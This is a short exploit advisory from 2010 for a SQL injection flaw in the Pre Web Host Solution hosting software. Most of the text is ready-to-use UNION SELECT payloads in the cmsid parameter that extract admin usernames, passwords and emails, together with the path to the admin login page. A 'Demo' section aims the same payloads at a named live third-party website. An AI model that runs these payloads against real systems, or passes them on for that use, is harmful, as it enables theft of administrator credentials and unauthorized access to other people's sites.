Pre Web Host Solution suffers from a remote SQL injection vulnerability.
f2bc9098551ac1d4ad5de0e06d52ee0a340480525dee559f8efc335f5423c8a8
In The Name Of GOD
[+] Exploit Title: PRE WEB HOST SOLUTION SQL Injection Vulnerability
[+] Date: 2010-11-13
[+] Author : Cru3l.b0y
[+] Software Link: http://www.preproject.com/preweb.asp
[+] Price : 150.00$
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :
Username : http://target/path/cmsdetail.php?cmsid=1+union+select+1,2,3,username+from+admin
Password : http://target/path/cmsdetail.php?cmsid=1+union+select+1,2,3,pass+from+admin
Email : http://target/path/cmsdetail.php?cmsid=1+union+select+1,2,3,Email+from+admin
[+] Admin Page: admin/adminlogin.php
[+] Demo:
Username : http://www.hostnomi.net/v2/cmsdetail.php?cmsid=1+union+select+1,2,3,username+from+admin
Password : http://www.hostnomi.net/v2/cmsdetail.php?cmsid=1+union+select+1,2,3,pass+from+admin
Email : http://www.hostnomi.net/v2/cmsdetail.php?cmsid=1+union+select+1,2,3,Email+from+admin